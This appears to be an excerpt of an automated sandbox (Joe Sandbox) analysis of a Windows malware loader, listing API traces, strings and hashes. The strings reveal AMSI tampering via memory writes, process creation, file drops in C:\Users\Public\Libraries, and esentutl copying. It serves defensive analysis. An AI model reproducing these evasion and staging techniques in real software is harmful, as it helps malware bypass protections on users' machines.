                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: /d $ /o$.url$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\esentutl.exe /y $CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTr
acerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$acS$advapi32$bcrypt$can$dbgcore$endpointdlp$http$ieproxy$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 297057983-2644593349
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: cc5195456597334ed6cab0cafa2b75f1c6cbd1f3734cd6480cc09aa530d4cc26
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 014484529a73543513d336285722779ee60e603b0876d6aee7b65b44c5319378
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cc5195456597334ed6cab0cafa2b75f1c6cbd1f3734cd6480cc09aa530d4cc26
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E5141E35B4421D8FDB91EBA4DE80ACF73B6EF89304F5040E1B609AB654DE34AE958F41

                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B089D0: FreeLibrary.KERNEL32(741D0000,00000000,00000000,00000000,00000000,02B7738C,Function_0000662C,00000004,02B7739C,02B7738C,05F5E103,00000040,02B773A0,741D0000,00000000,00000000), ref: 02B08AAA
                                                                                                                                                                                                                                                                                                                                                                                                                          • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02C6B7E0,02C6B824,OpenSession,02B77380,02B1B7B8,UacScan,02B77380), ref: 02B186E9
                                                                                                                                                                                                                                                                                                                                                                                                                          • ResumeThread.KERNEL32(00000000,ScanBuffer,02B77380,02B1B7B8,OpenSession,02B77380,02B1B7B8,UacScan,02B77380,02B1B7B8,ScanBuffer,02B77380,02B1B7B8,OpenSession,02B77380,02B1B7B8), ref: 02B18D33
                                                                                                                                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,ScanBuffer,02B77380,02B1B7B8,OpenSession,02B77380,02B1B7B8,UacScan,02B77380,02B1B7B8,00000000,ScanBuffer,02B77380,02B1B7B8,OpenSession,02B77380), ref: 02B18EB2
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B0894C: LoadLibraryW.KERNEL32(bcrypt,?,00000890,00000000,02B773A8,02B0A587,ScanString,02B773A8,02B0A93C,ScanBuffer,02B773A8,02B0A93C,Initialize,02B773A8,02B0A93C,UacScan), ref: 02B08960
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B0894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B0897A
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B0894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000890,00000000,02B773A8,02B0A587,ScanString,02B773A8,02B0A93C,ScanBuffer,02B773A8,02B0A93C,Initialize), ref: 02B089B6
                                                                                                                                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000,ScanBuffer,02B77380,02B1B7B8,UacInitialize,02B77380,02B1B7B8,ScanBuffer,02B77380,02B1B7B8,OpenSession,02B77380,02B1B7B8,UacScan,02B77380), ref: 02B192A4
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02AF7E5C: GetFileAttributesA.KERNEL32(00000000,?,02B1041F,ScanString,02B77380,02B1B7B8,OpenSession,02B77380,02B1B7B8,ScanString,02B77380,02B1B7B8,UacScan,02B77380,02B1B7B8,UacInitialize), ref: 02AF7E67
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B0DC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B0DD5E), ref: 02B0DCCB
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B0DC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02B0DD05
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B0DC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02B0DD32
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B0DC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02B0DD3B
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B08338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02B083C2), ref: 02B083A4
                                                                                                                                                                                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32(00000000,OpenSession,02B77380,02B1B7B8,ScanBuffer,02B77380,02B1B7B8,Initialize,02B77380,02B1B7B8,00000000,00000000,00000000,ScanString,02B77380,02B1B7B8), ref: 02B1B2FA
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
Memory Dump Source
• Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
• Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CloseFileLibrary$CreateFreeHandlePathProcess$AddressAttributesCacheExitFlushInstructionLoadNameName_ProcResumeThreadUserWrite
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2769005614-3738268246
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 429dcf1d505352bddf94d31002e1364a89da6ce80c70cc5cf586dbd1e534dfbd
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 23c4ae7857fcd0c3a3357cc377444a64ab9eadb50573730103e35b6709da202d
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 429dcf1d505352bddf94d31002e1364a89da6ce80c70cc5cf586dbd1e534dfbd
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7143F935A8461DCBDB51EBA4DE809CF73FAEF89304F5040E1B209AB650DE34AE958F51
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B089D0: FreeLibrary.KERNEL32(741D0000,00000000,00000000,00000000,00000000,02B7738C,Function_0000662C,00000004,02B7739C,02B7738C,05F5E103,00000040,02B773A0,741D0000,00000000,00000000), ref: 02B08AAA
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B0DC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B0DD5E), ref: 02B0DCCB
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B0DC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02B0DD05
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B0DC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02B0DD32
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B0DC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02B0DD3B
                                                                                                                                                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(000003E8,ScanBuffer,02B77380,02B1B7B8,UacScan,02B77380,02B1B7B8,ScanString,02B77380,02B1B7B8,02B1BB30,00000000,00000000,02B1BB24,00000000,00000000), ref: 02B140CB
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B088B8: LoadLibraryW.KERNEL32(amsi), ref: 02B088C1
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B088B8: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02B08920
                                                                                                                                                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(000003E8,ScanBuffer,02B77380,02B1B7B8,OpenSession,02B77380,02B1B7B8,UacScan,02B77380,02B1B7B8,000003E8,ScanBuffer,02B77380,02B1B7B8,UacScan,02B77380), ref: 02B14277
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B0894C: LoadLibraryW.KERNEL32(bcrypt,?,00000890,00000000,02B773A8,02B0A587,ScanString,02B773A8,02B0A93C,ScanBuffer,02B773A8,02B0A93C,Initialize,02B773A8,02B0A93C,UacScan), ref: 02B08960
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B0894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B0897A
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B0894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000890,00000000,02B773A8,02B0A587,ScanString,02B773A8,02B0A93C,ScanBuffer,02B773A8,02B0A93C,Initialize), ref: 02B089B6
                                                                                                                                                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00004E20,UacScan,02B77380,02B1B7B8,ScanString,02B77380,02B1B7B8,ScanBuffer,02B77380,02B1B7B8,OpenSession,02B77380,02B1B7B8,UacInitialize,02B77380,02B1B7B8), ref: 02B150EE
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B0DC04: RtlI.N(?,?,00000000,02B0DC7E), ref: 02B0DC2C
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B0DC04: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02B0DC7E), ref: 02B0DC42
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B0DC04: NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02B0DC7E), ref: 02B0DC61
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02AF7E5C: GetFileAttributesA.KERNEL32(00000000,?,02B1041F,ScanString,02B77380,02B1B7B8,OpenSession,02B77380,02B1B7B8,ScanString,02B77380,02B1B7B8,UacScan,02B77380,02B1B7B8,UacInitialize), ref: 02AF7E67
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B085BC: WinExec.KERNEL32(?,?), ref: 02B08624
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
Memory Dump Source
• Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
• Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Library$FilePath$FreeSleep$LoadNameName_$AddressAttributesCloseCreateDeleteExecProcWrite
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: /d $ /o$.url$C:\Users\Public\$C:\Users\Public\CApha.exe$C:\Users\Public\alpha.exe$C:\Users\Public\pha.exe$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\per.exe$C:\\Windows\\System32\\esentutl.exe /y $HotKey=$IconIndex=$Initialize$OpenSession$ScanBuffer$ScanString$URL=file:"$UacInitialize$UacScan$UacUninitialize$[InternetShortcut]$lld.SLITUTEN
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2171786310-3926298568
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: b9f10485aeb5fe7ba50affc4a5747a1994a11c35b695ce3f23f5b3dc9472e7b4
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: b57022d656f3e925f71da4c27dc59c3382916171ea0ed4a9f664b8d4600900cd
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b9f10485aeb5fe7ba50affc4a5747a1994a11c35b695ce3f23f5b3dc9472e7b4
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2B43FE35B8025D8FDB90EBA4DE80A9F73B6BF89304F5041E1A609A7650DF34AE85DF41

                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B089D0: FreeLibrary.KERNEL32(741D0000,00000000,00000000,00000000,00000000,02B7738C,Function_0000662C,00000004,02B7739C,02B7738C,05F5E103,00000040,02B773A0,741D0000,00000000,00000000), ref: 02B08AAA
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B08788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02B08814
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B0894C: LoadLibraryW.KERNEL32(bcrypt,?,00000890,00000000,02B773A8,02B0A587,ScanString,02B773A8,02B0A93C,ScanBuffer,02B773A8,02B0A93C,Initialize,02B773A8,02B0A93C,UacScan), ref: 02B08960
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B0894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B0897A
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B0894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000890,00000000,02B773A8,02B0A587,ScanString,02B773A8,02B0A93C,ScanBuffer,02B773A8,02B0A93C,Initialize), ref: 02B089B6
                                                                                                                                                                                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,ScanString,02B77380,02B0EF4C,OpenSession,02B77380,02B0EF4C,UacScan,02B77380,02B0EF4C,ScanBuffer,02B77380,02B0EF4C,OpenSession,02B77380), ref: 02B0ED6E
                                                                                                                                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000,000000FF,ScanString,02B77380,02B0EF4C,OpenSession,02B77380,02B0EF4C,UacScan,02B77380,02B0EF4C,ScanBuffer,02B77380,02B0EF4C,OpenSession), ref: 02B0ED76
                                                                                                                                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000874,00000000,00000000,000000FF,ScanString,02B77380,02B0EF4C,OpenSession,02B77380,02B0EF4C,UacScan,02B77380,02B0EF4C,ScanBuffer,02B77380,02B0EF4C), ref: 02B0ED7F
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
• Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
• Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Library$CloseFreeHandle$AddressCreateLoadObjectProcProcessSingleUserWait
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: )"C:\Users\Public\Libraries\wdmvmswJ.cmd" $Amsi$AmsiOpenSession$Initialize$NtOpenProcess$NtSetSecurityObject$OpenSession$ScanBuffer$ScanString$UacScan$ntdll
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3475578485-2237372370
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: c85a56bbdd6507552802ce97a260b07417cc81b3f02ef6dcefe69a110d8e2d1a
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 8f1e15f56dd55d289570fab73b19d0323a30d9f3718895913bce6e9949b4467f
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c85a56bbdd6507552802ce97a260b07417cc81b3f02ef6dcefe69a110d8e2d1a
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5B220C74B402599BEB91FBA4D9C1B8FB7B6AF89300F1044E1B604AB294DF34EE418F51

                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000000,?,02AF1FC1), ref: 02AF17D0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(0000000A,00000000,?,02AF1FC1), ref: 02AF17E6
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
• Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
• Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Sleep
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3472027048-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 8a6e85e7acb1869f595503c345bad16411120a73036de1e40fc985c793dab4c1
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: cd6378b5257f0855337a8cc69c9ae6c0866f545375ff39e57fb5773f5a31c7dc
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8a6e85e7acb1869f595503c345bad16411120a73036de1e40fc985c793dab4c1
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2AB14572A00341CFCB55CFA8D5C0355BBF1EB863A6F0986ADE64D8B385CB389555CB90

                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(amsi), ref: 02B088C1
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B08274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B082FC,?,?,00000000,00000000,?,02B08215,00000000,KernelBASE,00000000,00000000,02B0823C), ref: 02B082C1
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B08274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B082C7
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B08274: GetProcAddress.KERNEL32(?,?), ref: 02B082D9
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02B07D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B07DEC
                                                                                                                                                                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02B08920
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
• Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: DllGetClassObject$W$amsi
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 941070894-2671292670
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: ebc68fb940cd62651c987ce05cac5594828e1c4d2c93d99b8c13ba257bdaff73
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: c3b4530624b71c07e0d9db5453bd8f7681f2a2d71963cc5d7b291664537519a0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ebc68fb940cd62651c987ce05cac5594828e1c4d2c93d99b8c13ba257bdaff73
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CAF0445054C381B9D302E2B48C89F4FFFCD4B62664F048A98B2E85A2D2DA79D1059B77

                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000000,?,?,00000000,02AF1FE4), ref: 02AF1B17
                                                                                                                                                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,02AF1FE4), ref: 02AF1B31
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
• Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Sleep
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3472027048-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: fb684122d7748ab03ff5bdfa4af55c9cc5766d02bbc60a000ccec170ff60d2bc
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 0956e4df939a1013199d1d5f7e3a8df3329f4d8487cb4a407afbdff30455b532
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fb684122d7748ab03ff5bdfa4af55c9cc5766d02bbc60a000ccec170ff60d2bc
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7351B071641240CFD795DFACC9C4756BBE0AB46329F1885AEE648CB282EB78C446CB91

                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

APIs
• InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02B0E5F6
Strings
Memory Dump Source
• Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
